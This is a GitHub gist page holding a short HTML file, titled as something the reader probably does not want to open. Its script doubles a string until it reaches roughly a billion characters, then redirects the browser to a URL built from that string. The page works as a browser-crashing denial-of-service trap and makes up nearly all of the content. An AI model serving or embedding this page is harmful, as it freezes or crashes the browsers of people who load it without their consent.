Skip to content

Instantly share code, notes, and snippets.

@jesboat
Created August 18, 2014 19:12
Show Gist options
  • Save jesboat/1a6422f68b2fec5b60a5 to your computer and use it in GitHub Desktop.
Save jesboat/1a6422f68b2fec5b60a5 to your computer and use it in GitHub Desktop.
You probably don't want to open this
<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<title>Blah</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<body>
<script type="text/javascript">
x = "blah";
for (i=0; i<28; i++) {
x = x + x;
}
x = "http://" + x;
alert(x.length);
window.location = x;
</script>
<p>
<a href="http://validator.w3.org/check?uri=referer"><img
src="http://www.w3.org/Icons/valid-html401" alt="Valid HTML 4.01 Transitional" height="31" width="88"></a>
</p>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment